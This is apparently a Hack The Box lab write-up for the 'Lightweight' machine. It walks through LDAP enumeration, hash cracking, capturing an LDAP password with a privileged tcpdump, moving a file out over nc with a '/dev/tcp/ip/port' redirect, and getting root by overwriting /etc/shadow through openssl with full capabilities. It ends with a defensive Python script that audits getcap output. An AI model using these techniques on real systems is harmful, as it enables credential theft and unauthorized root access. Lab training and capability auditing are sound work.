This is a technical article shared by "Pika Pikachu", a writer on the i Spring and Autumn Forum. The public account aims to offer more learning methods and skills; the article is for learning reference only.
HTB (Hack The Box) is a target-machine platform offering many system types, and many of its boxes are close to real-world conditions, which makes it a good range for learning penetration testing.
1. Introduction to the target machine
This time the target machine is Lightweight, a solid medium-difficulty box.
2. Information collection
As usual I started with the Python tool autorecon; after it finished, ports 22, 80 and 389 were open.
3. Collect 80 port information
Port 80 first, as always: the site loads normally and has three subpages.
The Info page says a WAF will ban the IP of anyone who scans, and gobuster confirms the site cannot be brute-forced.
The Status page says its data is refreshed every minute.
The User page says an SSH account has been created whose password is my own IP address.
4. Use the nmap script to collect LDAP port information
Back to port 389: I used the nmap LDAP scripts found online (--script "ldap* and not brute") to gather information.
They worked well: two accounts, ldapuser1 and ldapuser2, and their two password hashes were found.
I saved the hashes and ran John on them for four and a half hours without cracking them.
5. Log in to port 22 mining information
With nothing else to go on, I logged in through port 22.
After poking around I found no useful information; most directories were not accessible.
So I transferred LinEnum to the target machine to see whether any privileged programs could be run.
6. Use LinEnum to assist in mining privilege programs
Running ./LinEnum.sh here showed that tcpdump has file capabilities set.
A one-sentence summary from an expert online: Linux capabilities let a program run by an ordinary user do specific things that otherwise only the superuser can do.
At first I went straight to GTFOBins to try to turn this into root, but the results were not great.
So I looked more closely at tcpdump's two capabilities: cap_net_admin and cap_net_raw, with +ep.
You can read man capabilities on Kali or look it up online. In summary, cap_net_admin = perform various network-related operations: change interface configuration, manage the IP firewall, modify the routing table, and so on.
cap_net_raw = use RAW and PACKET sockets, and bind to any port for proxy listening / packet capture. The trailing +ep means these capabilities are in the effective and permitted sets, i.e. tcpdump runs privileged.
7. Use tcpdump to grab packets
Now that we know tcpdump is somewhat privileged, we can log in with ssh and start tcpdump listening.
-i any = listen on all interfaces
-U = packet-buffered output (write each packet as soon as it is captured)
-w file = write the captured packets to file
Then we go back to port 80 and click around the pages and function points to generate some traffic. Opening the capture in Wireshark, the LDAP traffic caught contains uid=ldapuser2 followed by a string that I guessed was the password.
su to that user succeeded, and I got the flag.
8. Use john to crack the 7z password
In the same directory as the flag there is also a backup .7z, so it has to be brought back to the local machine for a closer look.
However, scp and Python were not usable, so it could only be transferred with nc.
First open a listening port locally on Kali and redirect it to a file (> filename).
Then on the target machine run cat filename > /dev/tcp/ip/port.
Of course the archive has a password. But John's directory contains 7z2john.pl, which is made specifically for 7z archives.
This method also works on an archive that has a password.
If it cannot be run directly, you have to install a module with apt.
Finally run the script to extract the hash, then feed it to John with a dictionary; the password comes out as delete.
Inside the archive are 4 PHP files, and finally the account password is in status.php.
su with it succeeds.
9. Elevation of rights
Having just learned about Linux capabilities, I then noticed that openssl actually has =ep set.
Of course this ep is not the same as the +ep above: +ep applies to the listed capabilities, while a bare =ep grants all capabilities.
The openssl privilege-escalation method: use openssl to generate a password hash, build a new shadow file in which root's hash is replaced with that new one, and use the privileged openssl to overwrite the old shadow file.
You can see that running cat /etc/shadow directly fails, while reading it through openssl works.
Use openssl passwd -1 to generate a new salted password hash.
Here I set it to 123456 or 12345 and tried each separately.
It is then placed into the newly created shadow file.
After fetching the file with wget again, the old /etc/shadow is replaced with the new one through the privileged openssl.
Finally, switching to root succeeded.
That's all for today's share; did you understand it?
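The two capability findings above (tcpdump with cap_net_admin,cap_net_raw+ep and openssl with a bare =ep) are exactly what a defender should be auditing for. As an added example that is not part of the original write-up, the script below parses the output of getcap -r / in both the older and newer libcap print styles, applies the cap_to_text(3) clause rules explained above, and rates each binary; the sample lines are constructed, not captured from the box, and the risk tiers are my own grouping.

```python
import re
# Constructed sample (not captured from the box), in both getcap print styles:
# older libcap "<path> = <caps>+ep" and newer libcap "<path> <caps>=ep".
SAMPLE_GETCAP = """\
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep
/usr/bin/openssl =ep
/usr/bin/ping cap_net_raw=ep
"""
# Caps that amount to root when effective+permitted on a binary any local user can run.
ROOT_EQUIVALENT = {"cap_sys_admin", "cap_dac_override", "cap_dac_read_search", "cap_setuid", "cap_setgid",
                   "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner", "cap_setfcap", "cap_sys_rawio"}
# Network caps let a user sniff traffic or reconfigure interfaces (tcpdump had both here).
NETWORK = {"cap_net_admin", "cap_net_raw", "cap_net_bind_service"}
# One clause of cap_to_text(3) syntax: optional cap list, operator, flag letters.
CLAUSE = re.compile(r"([a-z_0-9,]*)([=+-])([eip]*)")

def parse_cap_text(text):
    """Return {cap: set(flags)}; the key "*" stands for the whole set (a bare "=ep")."""
    caps = {}
    for names, op, flags in CLAUSE.findall(text.replace(" ", "")):
        for cap in names.split(",") if names else ["*"]:
            if op == "=":
                if cap == "*":
                    caps.clear()  # "=" with no list resets every capability first
                caps[cap] = set(flags)
            elif op == "+":
                caps.setdefault(cap, set()).update(flags)
            else:  # "-" (simplification: "*" is kept as its own key, not expanded)
                caps.setdefault(cap, set()).difference_update(flags)
    return caps

def rate(active):
    """Rate the set of capabilities that are both effective and permitted."""
    if "*" in active or active & ROOT_EQUIVALENT:
        return "CRITICAL"
    return "MEDIUM" if active & NETWORK else ("LOW" if active else "NONE")

def audit(getcap_output):
    """Return [(path, rating, sorted active caps)] for each non-empty getcap line."""
    findings = []
    for line in filter(str.strip, getcap_output.splitlines()):
        path, _, cap_text = line.partition(" ")
        caps = parse_cap_text(cap_text)
        active = {c for c, f in caps.items() if {"e", "p"} <= f}  # effective AND permitted
        findings.append((path, rate(active), sorted(active)))
    return findings

if __name__ == "__main__":
    for path, level, active in audit(SAMPLE_GETCAP):
        print(f"{level:8} {path:24} {','.join(active) or '-'}")
```

Anything rated CRITICAL (a bare =ep, or a root-equivalent capability) on a world-executable binary deserves the same scrutiny as a setuid-root file.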